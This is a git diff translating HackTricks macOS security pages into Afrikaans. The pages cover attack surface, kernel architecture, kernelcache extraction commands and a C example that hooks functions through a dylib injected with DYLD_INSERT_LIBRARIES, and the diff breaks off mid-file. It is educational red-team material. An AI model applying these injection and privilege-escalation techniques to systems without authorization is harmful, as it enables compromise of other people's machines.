toestemmings:** {% content-ref url="macos-files-folders-and-binaries/" %} [macos-files-folders-and-binaries](macos-files-folders-and-binaries/) {% endcontent-ref %} -* Common macOS **users** +* Algemene macOS **gebruikers** {% content-ref url="macos-users.md" %} [macos-users.md](macos-users.md) @@ -51,56 +51,56 @@ If you are not familiar with macOS, you should start learning the basics of macO [macos-applefs.md](macos-applefs.md) {% endcontent-ref %} -* The **architecture** of the k**ernel** +* Die **argitektuur** van die k**ernel** {% content-ref url="mac-os-architecture/" %} [mac-os-architecture](mac-os-architecture/) {% endcontent-ref %} -* Common macOS n**etwork services & protocols** +* Algemene macOS-n**etwerkdienste & protokolle** {% content-ref url="macos-protocols.md" %} [macos-protocols.md](macos-protocols.md) {% endcontent-ref %} * **Opensource** macOS: [https://opensource.apple.com/](https://opensource.apple.com/) - * To download a `tar.gz` change a URL such as [https://opensource.apple.com/**source**/dyld/](https://opensource.apple.com/source/dyld/) to [https://opensource.apple.com/**tarballs**/dyld/**dyld-852.2.tar.gz**](https://opensource.apple.com/tarballs/dyld/dyld-852.2.tar.gz) +* Om 'n `tar.gz` af te laai, verander 'n URL soos [https://opensource.apple.com/**source**/dyld/](https://opensource.apple.com/source/dyld/) na [https://opensource.apple.com/**tarballs**/dyld/**dyld-852.2.tar.gz**](https://opensource.apple.com/tarballs/dyld/dyld-852.2.tar.gz) ### MacOS MDM -In companies **macOS** systems are highly probably going to be **managed with a MDM**. Therefore, from the perspective of an attacker is interesting to know **how that works**: +In maatskappye word **macOS**-stelsels hoogstwaarskynlik **bestuur met 'n MDM**. Daarom is dit interessant vir 'n aanvaller om te weet **hoe dit werk**: {% content-ref url="../macos-red-teaming/macos-mdm/" %} [macos-mdm](../macos-red-teaming/macos-mdm/) {% endcontent-ref %} -### MacOS - Inspecting, Debugging and Fuzzing +### MacOS - Inspekteer, Debuksie en Fuzzing {% content-ref url="macos-apps-inspecting-debugging-and-fuzzing/" %} [macos-apps-inspecting-debugging-and-fuzzing](macos-apps-inspecting-debugging-and-fuzzing/) {% endcontent-ref %} -## MacOS Security Protections +## MacOS Sekuriteitsbeskerming {% content-ref url="macos-security-protections/" %} [macos-security-protections](macos-security-protections/) {% endcontent-ref %} -## Attack Surface +## Aanvalsoppervlak -### File Permissions +### Lêertoestemmings -If a **process running as root writes** a file that can be controlled by a user, the user could abuse this to **escalate privileges**.\ -This could occur in the following situations: +As 'n **proses wat as root loop** 'n lêer skryf wat deur 'n gebruiker beheer kan word, kan die gebruiker dit misbruik om **voorregte te verhoog**.\ +Dit kan in die volgende situasies gebeur: -* File used was already created by a user (owned by the user) -* File used is writable by the user because of a group -* File used is inside a directory owned by the user (the user could create the file) -* File used is inside a directory owned by root but user has write access over it because of a group (the user could create the file) +* Die gebruikte lêer is reeds deur 'n gebruiker geskep (behoort aan die gebruiker) +* Die gebruikte lêer is skryfbaar deur die gebruiker as gevolg van 'n groep +* Die gebruikte lêer is binne 'n gids wat aan die gebruiker behoort (die gebruiker kan die lêer skep) +* Die gebruikte lêer is binne 'n gids wat aan root behoort, maar die gebruiker het skryftoegang daartoe as gevolg van 'n groep (die gebruiker kan die lêer skep) -Being able to **create a file** that is going to be **used by root**, allows a user to **take advantage of its content** or even create **symlinks/hardlinks** to point it to another place. +Om 'n lêer te **skep** wat deur root gebruik gaan word, stel 'n gebruiker in staat om van die inhoud daarvan gebruik te maak of selfs **simboliese skakels/harde skakels** te skep om dit na 'n ander plek te verwys. -For this kind of vulnerabilities don't forget to **check vulnerable `.pkg` installers**: +Vir hierdie soort kwesbaarhede, moenie vergeet om kwesbare `.pkg`-installeerders te **ondersoek** nie: {% content-ref url="macos-files-folders-and-binaries/macos-installers-abuse.md" %} [macos-installers-abuse.md](macos-files-folders-and-binaries/macos-installers-abuse.md) @@ -108,33 +108,32 @@ For this kind of vulnerabilities don't forget to **check vulnerable `.pkg` insta -### File Extension & URL scheme app handlers +### Lêeruitbreiding & URL-skema-apphanteraars -Weird apps registered by file extensions could be abused and different applications can be register to open specific protocols +Vreemde programme wat geregistreer is deur lêeruitbreidings, kan misbruik word en verskillende toepassings kan geregistreer word om spesifieke protokolle oop te maak {% content-ref url="macos-file-extension-apps.md" %} [macos-file-extension-apps.md](macos-file-extension-apps.md) {% endcontent-ref %} -## macOS TCC / SIP Privilege Escalation +## macOS TCC / SIP Voorregverhoging -In macOS **applications and binaries can have permissions** to access folders or settings that make them more privileged than others. +In macOS **kan programme en binnerwerke toestemmings hê** om toegang tot lêers of instellings te verkry wat hulle bevoorregter maak as ander. -Therefore, an attacker that wants to successfully compromise a macOS machine will need to **escalate its TCC privileges** (or even **bypass SIP**, depending on his needs). +Daarom sal 'n aanvaller wat 'n macOS-rekenaar suksesvol wil kompromitteer, sy TCC-voorregte moet **verhoog** (of selfs **SIP omseil**, afhangende van sy behoeftes). -These privileges are usually given in the form of **entitlements** the application is signed with, or the application might requested some accesses and after the **user approving them** they can be found in the **TCC databases**. Another way a process can obtain these privileges is by being a **child of a process** with those **privileges** as they are usually **inherited**. +Hierdie voorregte word gewoonlik gegee in die vorm van **toekennings** waarvoor die toepassing onderteken is, of die toepassing kan toegang versoek en nadat die **gebruiker dit goedgekeur** het, kan dit in die **TCC-databasisse** gevind word. 'n Proses kan hierdie voorregte ook verkry deur 'n **kind van 'n proses** te wees met daardie **voorregte**, aangesien hulle gewoonlik **oorerf** word. -Follow these links to find different was to [**escalate privileges in TCC**](macos-security-protections/macos-tcc/#tcc-privesc-and-bypasses), to [**bypass TCC**](macos-security-protections/macos-tcc/macos-tcc-bypasses/) and how in the past [**SIP has been bypassed**](macos-security-protections/macos-sip.md#sip-bypasses). +Volg hierdie skakels om verskillende maniere te vind om [**voorregte in TCC te verhoog**](macos-security-protections/macos-tcc/#tcc-privesc-and-bypasses), om [**TCC te omseil**](macos-security-protections/macos-tcc/macos-tcc-bypasses/) en hoe in die verlede [**SIP omseil is**](macos-security-protections/macos-sip.md#sip-bypasses). -## macOS Traditional Privilege Escalation +## macOS Tradisionele Voorregverhoging -Of course from a red teams perspective you should be also interested in escalating to root. Check the following post for some hints: +Natuurlik moet jy as 'n rooi span ook belangstel om na root te verhoog. Kyk na die volgende berig vir 'n paar wenke: {% content-ref url="macos-privilege-escalation.md" %} [macos-privilege-escalation.md](macos-privilege-escalation.md) {% endcontent-ref %} - -## References +## Verwysings * [**OS X Incident Response: Scripting and Analysis**](https://www.amazon.com/OS-Incident-Response-Scripting-Analysis-ebook/dp/B01FHOHHVS) * [**https://taomm.org/vol1/analysis.html**](https://taomm.org/vol1/analysis.html) @@ -144,29 +143,29 @@ Of course from a red teams perspective you should be also interested in escalati
-Join [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) server to communicate with experienced hackers and bug bounty hunters! +Sluit aan by die [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) bediener om met ervare hackers en foutbeloningsjagters te kommunikeer! -**Hacking Insights**\ -Engage with content that delves into the thrill and challenges of hacking +**Hacking-insigte**\ +Raak betrokke by inhoud wat die opwinding en uitdagings van hacking ondersoek **Real-Time Hack News**\ -Keep up-to-date with fast-paced hacking world through real-time news and insights +Bly op hoogte van die vinnige wêreld van hacking deur middel van real-time nuus en insigte -**Latest Announcements**\ -Stay informed with the newest bug bounties launching and crucial platform updates +**Nuutste aankondigings**\ +Bly ingelig met die nuutste foutbelonings wat bekendgestel word en belangrike platform-opdaterings -**Join us on** [**Discord**](https://discord.com/invite/N3FrSbmwdy) and start collaborating with top hackers today! +**Sluit aan by ons op** [**Discord**](https://discord.com/invite/N3FrSbmwdy) en begin vandag saamwerk met top hackers!
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md index f8cd86d65..aaa96307b 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md +++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md @@ -1,57 +1,57 @@ -# macOS Kernel & System Extensions +# macOS Kernel & Stelseluitbreidings
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
## XNU Kernel -The **core of macOS is XNU**, which stands for "X is Not Unix". This kernel is fundamentally composed of the **Mach microkerne**l (to be discussed later), **and** elements from Berkeley Software Distribution (**BSD**). XNU also provides a platform for **kernel drivers via a system called the I/O Kit**. The XNU kernel is part of the Darwin open source project, which means **its source code is freely accessible**. +Die **kern van macOS is XNU**, wat staan vir "X is Not Unix". Hierdie kern bestaan ​​hoofsaaklik uit die **Mach-mikrokern** (wat later bespreek sal word), **en** elemente van die Berkeley Software Distribution (**BSD**). XNU bied ook 'n platform vir **kernbestuurders deur 'n stelsel genaamd die I/O Kit**. Die XNU-kern is deel van die Darwin oopbronprojek, wat beteken dat **sy bronkode vrylik toeganklik is**. -From a perspective of a security researcher or a Unix developer, **macOS** can feel quite **similar** to a **FreeBSD** system with an elegant GUI and a host of custom applications. Most applications developed for BSD will compile and run on macOS without needing modifications, as the command-line tools familiar to Unix users are all present in macOS. However, because the XNU kernel incorporates Mach, there are some significant differences between a traditional Unix-like system and macOS, and these differences might cause potential issues or provide unique advantages. +Vanuit die oogpunt van 'n sekuriteitsnavorsers of 'n Unix-ontwikkelaar, kan **macOS** redelik **soortgelyk** voel aan 'n **FreeBSD**-sisteem met 'n elegante GUI en 'n verskeidenheid aangepaste toepassings. Die meeste toepassings wat vir BSD ontwikkel is, sal op macOS kompilasie en uitvoering sonder om wysigings nodig te hê, aangesien die opdraggelynhulpmiddels wat bekend is aan Unix-gebruikers almal teenwoordig is in macOS. Tog, omdat die XNU-kern Mach inkorporeer, is daar 'n paar belangrike verskille tussen 'n tradisionele Unix-soortgelyke stelsel en macOS, en hierdie verskille kan potensiële probleme veroorsaak of unieke voordele bied. -Open source version of XNU: [https://opensource.apple.com/source/xnu/](https://opensource.apple.com/source/xnu/) +Oopbronweergawe van XNU: [https://opensource.apple.com/source/xnu/](https://opensource.apple.com/source/xnu/) ### Mach -Mach is a **microkernel** designed to be **UNIX-compatible**. One of its key design principles was to **minimize** the amount of **code** running in the **kernel** space and instead allow many typical kernel functions, such as file system, networking, and I/O, to **run as user-level tasks**. +Mach is 'n **mikrokern** wat ontwerp is om **UNIX-verenigbaar** te wees. Een van sy sleutelontwerpbeginsels was om die hoeveelheid **kode** wat in die **kern**-ruimte uitgevoer word, te **minimeer** en eerder baie tipiese kernfunksies, soos lêersisteem, netwerk en I/O, as **gebruikervlak-take** te laat uitvoer. -In XNU, Mach is **responsible for many of the critical low-level operations** a kernel typically handles, such as processor scheduling, multitasking, and virtual memory management. +In XNU is Mach **verantwoordelik vir baie van die kritieke lae-vlak-operasies** wat 'n kern tipies hanteer, soos prosessorbeplanning, multitasking en virtuele geheuebestuur. ### BSD -The XNU **kernel** also **incorporates** a significant amount of code derived from the **FreeBSD** project. This code **runs as part of the kernel along with Mach**, in the same address space. However, the FreeBSD code within XNU may differ substantially from the original FreeBSD code because modifications were required to ensure its compatibility with Mach. FreeBSD contributes to many kernel operations including: +Die XNU **kern** inkorporeer ook 'n aansienlike hoeveelheid kode wat afgelei is van die **FreeBSD**-projek. Hierdie kode **loop as deel van die kern saam met Mach** in dieselfde adresruimte. Die FreeBSD-kode binne XNU kan egter aansienlik verskil van die oorspronklike FreeBSD-kode omdat wysigings nodig was om die verenigbaarheid met Mach te verseker. FreeBSD dra by tot baie kernoperasies, insluitend: -* Process management -* Signal handling -* Basic security mechanisms, including user and group management -* System call infrastructure -* TCP/IP stack and sockets -* Firewall and packet filtering +* Prosesbestuur +* Seinhantering +* Basiese sekuriteitsmeganismes, insluitend gebruiker- en groepbestuur +* Stelseloproep-infrastruktuur +* TCP/IP-stapel en sokkels +* Brandmuur en pakkiefiltering -Understanding the interaction between BSD and Mach can be complex, due to their different conceptual frameworks. For instance, BSD uses processes as its fundamental executing unit, while Mach operates based on threads. This discrepancy is reconciled in XNU by **associating each BSD process with a Mach task** that contains exactly one Mach thread. When BSD's fork() system call is used, the BSD code within the kernel uses Mach functions to create a task and a thread structure. +Die begrip van die interaksie tussen BSD en Mach kan kompleks wees as gevolg van hul verskillende konseptuele raamwerke. Byvoorbeeld, BSD gebruik prosesse as sy fundamentele uitvoerende eenheid, terwyl Mach op drade gebaseer is. Hierdie teenstrydigheid word in XNU verreken deur **elke BSD-proses te koppel aan 'n Mach-taak** wat presies een Mach-draad bevat. Wanneer BSD se fork()-stelseloproep gebruik word, gebruik die BSD-kode binne die kern Mach-funksies om 'n taak- en draadstruktuur te skep. -Moreover, **Mach and BSD each maintain different security models**: **Mach's** security model is based on **port rights**, whereas BSD's security model operates based on **process ownership**. Disparities between these two models have occasionally resulted in local privilege-escalation vulnerabilities. Apart from typical system calls, there are also **Mach traps that allow user-space programs to interact with the kernel**. These different elements together form the multifaceted, hybrid architecture of the macOS kernel. +Verder **handhaaf Mach en BSD elk 'n ander sekuriteitsmodel**: **Mach se** sekuriteitsmodel is gebaseer op **poortregte**, terwyl BSD se sekuriteitsmodel gebaseer is op **proses-eienaarskap**. Verskille tussen hierdie twee modelle het soms gelei tot plaaslike voorreg-escalatiekwesbaarhede. Afgesien van tipiese stelseloproepe, is daar ook **Mach-valstrikke wat gebruikersruimteprogramme in staat stel om met die kern te kommunikeer**. Hierdie verskillende elemente vorm saam die veelsydige, hibriede argitektuur van die macOS-kern. -### I/O Kit - Drivers +### I/O Kit - Bestuurders -The I/O Kit is an open-source, object-oriented **device-driver framework** in the XNU kernel, handles **dynamically loaded device drivers**. It allows modular code to be added to the kernel on-the-fly, supporting diverse hardware. +Die I/O Kit is 'n oopbron, objekgeoriënteerde **toestelbestuurder-raamwerk** in die XNU-kern, wat **dinamies gelaai toestelbestuurders** hanteer. Dit maak dit moontlik om modulêre kode op die vlieg by die kern te voeg, wat diverse hardeware ondersteun. {% content-ref url="macos-iokit.md" %} [macos-iokit.md](macos-iokit.md) {% endcontent-ref %} -### IPC - Inter Process Communication +### IPC - Interproseskommunikasie {% content-ref url="macos-ipc-inter-process-communication/" %} [macos-ipc-inter-process-communication](macos-ipc-inter-process-communication/) @@ -59,29 +59,28 @@ The I/O Kit is an open-source, object-oriented **device-driver framework** in th ### Kernelcache -The **kernelcache** is a **pre-compiled and pre-linked version of the XNU kernel**, along with essential device **drivers** and **kernel extensions**. It's stored in a **compressed** format and gets decompressed into memory during the boot-up process. The kernelcache facilitates a **faster boot time** by having a ready-to-run version of the kernel and crucial drivers available, reducing the time and resources that would otherwise be spent on dynamically loading and linking these components at boot time. +Die **kernelcache** is 'n **vooraf gekompileerde en vooraf gekoppelde weergawe van die XNU-kern**, tesame met noodsaaklike toestel-**bestuurders** en **kernuitbreidings**. Dit word in 'n **gekomprimeerde** formaat gestoor en word tydens die opstartproses in die geheue gedekomprimeer. Die kernelcache fasiliteer 'n **vinniger opstarttyd** deur 'n gereed-om-uitgevoerde weergawe van die kern en belangrike bestuurders beskikbaar te hê, wat die tyd en hulpbronne verminder wat andersins sou word spandeer op die dinamiese laai en koppeling van hierdie komponente tydens die opstartproses. -In iOS it's located in **`/System/Library/Caches/com.apple.kernelcaches/kernelcache`** in macOS you can find it with **`find / -name kernelcache 2>/dev/null`** +In iOS is dit geleë in **`/System/Library/Caches/com.apple.kernelcaches/kernelcache`** in macOS kan jy dit vind met **`find / -name kernelcache 2>/dev/null`** #### IMG4 -The IMG4 file format is a container format used by Apple in its iOS and macOS devices for securely **storing and verifying firmware** components (like **kernelcache**). The IMG4 format includes a header and several tags which encapsulate different pieces of data including the actual payload (like a kernel or bootloader), a signature, and a set of manifest properties. The format supports cryptographic verification, allowing the device to confirm the authenticity and integrity of the firmware component before executing it. +Die IMG4-lêerformaat is 'n houerformaat wat deur Apple in sy iOS- en macOS-toestelle gebruik word om firmware-komponente (soos **kernelcache**) veilig te **stoor en te verifieer**. Die IMG4-formaat sluit 'n kop en verskeie etikette in wat verskillende stukke data insluit, insluitend die werklike nutslading (soos 'n kern of opstartlader), 'n handtekening en 'n stel manifesteienskappe. Die formaat ondersteun kriptografiese verifikasie, wat die toestel in staat stel om die egtheid en integriteit van die firmware-komponent te bevestig voordat dit uitgevoer word. -It's usually composed of the following components: +Dit bestaan ​​gewoonlik uit die volgende komponente: -* **Payload (IM4P)**: - * Often compressed (LZFSE4, LZSS, …) - * Optionally encrypted +* **Nutslading (IM4P)**: +* Dikwels saamgedruk (LZFSE4, LZSS, ...) +* Opsioneel versleutel * **Manifest (IM4M)**: - * Contains Signature - * Additional Key/Value dictionary -* **Restore Info (IM4R)**: - * Also known as APNonce - * Prevents replaying of some updates - * OPTIONAL: Usually this isn't found - -Decompress the Kernelcache: +* Bevat handtekening +* Addisionele Sleutel/Waarde-woordeboek +* **Herstelinfo (IM4R)**: +* Ook bekend as APNonce +* Voorkom dat sekere opdaterings herhaal word +* OPSIONEEL: Gewoonlik word dit nie gevind nie +Dekomprimeer die Kernelcache: ```bash # pyimg4 (https://github.com/m1stadev/PyIMG4) pyimg4 im4p extract -i kernelcache.release.iphone14 -o kernelcache.release.iphone14.e @@ -89,17 +88,16 @@ pyimg4 im4p extract -i kernelcache.release.iphone14 -o kernelcache.release.iphon # img4tool (https://github.com/tihmstar/img4tool img4tool -e kernelcache.release.iphone14 -o kernelcache.release.iphone14.e ``` +#### Kernelcache Simbole -#### Kernelcache Symbols - -Sometime Apple releases **kernelcache** with **symbols**. You can download some firmwares with symbols by following links on [https://theapplewiki.com](https://theapplewiki.com/). +Soms versprei Apple **kernelcache** met **simbole**. Jy kan sommige firmwares met simbole aflaai deur die skakels op [https://theapplewiki.com](https://theapplewiki.com/) te volg. ### IPSW -These are Apple **firmwares** you can download from [**https://ipsw.me/**](https://ipsw.me/). Among other files it will contains the **kernelcache**.\ -To **extract** the files you can just **unzip** it. +Dit is Apple **firmwares** wat jy kan aflaai vanaf [**https://ipsw.me/**](https://ipsw.me/). Onder andere lêers bevat dit die **kernelcache**.\ +Om die lêers uit te pak, kan jy dit net **onttrek**. -After extracting the firmware you will get a file like: **`kernelcache.release.iphone14`**. It's in **IMG4** format, you can extract the interesting info with: +Nadat jy die firmware uitgepak het, sal jy 'n lêer soos hierdie kry: **`kernelcache.release.iphone14`**. Dit is in **IMG4**-formaat, jy kan die interessante inligting uittrek met: * [**pyimg4**](https://github.com/m1stadev/PyIMG4) @@ -110,15 +108,12 @@ pyimg4 im4p extract -i kernelcache.release.iphone14 -o kernelcache.release.iphon {% endcode %} * [**img4tool**](https://github.com/tihmstar/img4tool) - ```bash img4tool -e kernelcache.release.iphone14 -o kernelcache.release.iphone14.e ``` +Jy kan die uitgepakte kernelcache vir simbole nagaan met: **`nm -a kernelcache.release.iphone14.e | wc -l`** -You can check the extracted kernelcache for symbols with: **`nm -a kernelcache.release.iphone14.e | wc -l`** - -With this we can now **extract all the extensions** or the **one you are insterested in:** - +Met hierdie kan ons nou **alle uitbreidings onttrek** of die **een waarin jy belangstel:** ```bash # List all extensions kextex -l kernelcache.release.iphone14.e @@ -131,38 +126,37 @@ kextex_all kernelcache.release.iphone14.e # Check the extension for symbols nm -a binaries/com.apple.security.sandbox | wc -l ``` +## macOS Kerneluitbreidings -## macOS Kernel Extensions - -macOS is **super restrictive to load Kernel Extensions** (.kext) because of the high privileges that code will run with. Actually, by default is virtually impossible (unless a bypass is found). +macOS is **baie beperkend om Kerneluitbreidings** (.kext) te laai as gevolg van die hoë bevoegdhede waarmee kode sal loop. In werklikheid is dit by verstek feitlik onmoontlik (behalwe as 'n omweg gevind word). {% content-ref url="macos-kernel-extensions.md" %} [macos-kernel-extensions.md](macos-kernel-extensions.md) {% endcontent-ref %} -### macOS System Extensions +### macOS-stelseluitbreidings -Instead of using Kernel Extensions macOS created the System Extensions, which offers in user level APIs to interact with the kernel. This way, developers can avoid to use kernel extensions. +In plaas daarvan om Kerneluitbreidings te gebruik, het macOS die Stelseluitbreidings geskep, wat gebruikersvlak-API's bied om met die kernel te kommunikeer. Op hierdie manier kan ontwikkelaars voorkom om kerneluitbreidings te gebruik. {% content-ref url="macos-system-extensions.md" %} [macos-system-extensions.md](macos-system-extensions.md) {% endcontent-ref %} -## References +## Verwysings * [**The Mac Hacker's Handbook**](https://www.amazon.com/-/es/Charlie-Miller-ebook-dp-B004U7MUMU/dp/B004U7MUMU/ref=mt\_other?\_encoding=UTF8\&me=\&qid=) * [**https://taomm.org/vol1/analysis.html**](https://taomm.org/vol1/analysis.html)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
diff --git a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-function-hooking.md b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-function-hooking.md index 6746f852b..d6c9e898f 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-function-hooking.md +++ b/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-function-hooking.md @@ -1,24 +1,24 @@ -# macOS Function Hooking +# macOS Funksie Hooking
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Function Interposing +## Funksie Interposing -Create a **dylib** with an **`__interpose`** section (or a section flagged with **`S_INTERPOSING`**) containing tuples of **function pointers** that refer to the **original** and the **replacement** functions. +Skep 'n **dylib** met 'n **`__interpose`**-afdeling (of 'n afdeling wat gemerk is met **`S_INTERPOSING`**) wat tuples van **funksie-aanwysers** bevat wat verwys na die **oorspronklike** en die **vervangings**-funksies. -Then, **inject** the dylib with **`DYLD_INSERT_LIBRARIES`** (the interposing needs occur before the main app loads). Obviously the [**restrictions** applied to the use of **`DYLD_INSERT_LIBRARIES`** applies here also](../macos-proces-abuse/macos-library-injection/#check-restrictions). +Injecteer dan die dylib met **`DYLD_INSERT_LIBRARIES`** (die interposing moet plaasvind voordat die hoofprogram laai). Uiteraard geld die [**beperkings** wat op die gebruik van **`DYLD_INSERT_LIBRARIES`** van toepassing is, ook hier](../macos-proces-abuse/macos-library-injection/#check-restrictions). ### Interpose printf @@ -31,13 +31,13 @@ Then, **inject** the dylib with **`DYLD_INSERT_LIBRARIES`** (the interposing nee #include int my_printf(const char *format, ...) { - //va_list args; - //va_start(args, format); - //int ret = vprintf(format, args); - //va_end(args); +//va_list args; +//va_start(args, format); +//int ret = vprintf(format, args); +//va_end(args); - int ret = printf("Hello from interpose\n"); - return ret; +int ret = printf("Hello from interpose\n"); +return ret; } __attribute__((used)) static struct { const void *replacement; const void *replacee; } _interpose_printf @@ -52,13 +52,75 @@ __attribute__ ((section ("__DATA,__interpose"))) = { (const void *)(unsigned lon #include int main() { - printf("Hello World!\n"); - return 0; +printf("Hello World!\n"); +return 0; } ``` -{% endtab %} - {% tab title="interpose2.c" %} + +```c +#include +#include +#include + +// Function pointer type for the original function +typedef int (*orig_open_type)(const char *pathname, int flags); + +// Function pointer type for the interposed function 